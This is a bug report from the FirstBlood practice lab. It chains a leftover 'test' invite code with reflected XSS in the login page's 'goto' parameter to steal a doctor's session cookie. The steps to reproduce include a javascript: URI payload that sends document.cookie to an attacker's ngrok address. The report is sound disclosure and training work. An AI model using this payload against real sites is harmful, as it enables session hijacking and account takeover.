FirstBlood-#613[COLLAB] Can register as a doctor and steal token upon login.
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, amec0e Level 3 reported:

Hey mate,

I found that on the register.php endpoint we can register as a new doctor using a inviteCode with the value test, registering as a new doctor and then clicking on a link to the login page from a malicious user, upon the doctor logging via the endpoint login.php they will be sent to our ngrok address where we can steal their drps= token via the parameter goto on the login endpoint.

Impact:

A user can register as a doctor using the inviteCode=test then following a link from a malicious user we can steal the doctors drps= token because of the lack of a httponly flag on the drps cookie.

Steps to Reproduce:

  • Visit the endpoint register.php
  • Enter a username and in the invite code use test
  • Click register and you will now be given credentials.

Request:

Response:

  • Click "Continue to login"
  • Start our Ngrok server.
  • Append the following parameter to the login URL:
    ?goto=javascript:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
  • Replace your ngrok address in the payload and Press "Enter"
  • Now login with your new credentials and you will be redirected to your ngrok address.

NOTE: You will receive a error and maybe a 404 this is normal.

You will now see the token has been leaked to our ngrok address.

Remediation:

Update filtering to protect against javascript URI redirection.

Best regards,

Amec0e.

In Collaboration with thebinarybot

P2 High

This bug makes use of the following vulnerabilities in a chain:

  • Reflective XSS
  • Auth issues


FirstBlood ID: 39
Vulnerability Type: Reflective XSS

Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.

FirstBlood ID: 24
Vulnerability Type: Auth issues

The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.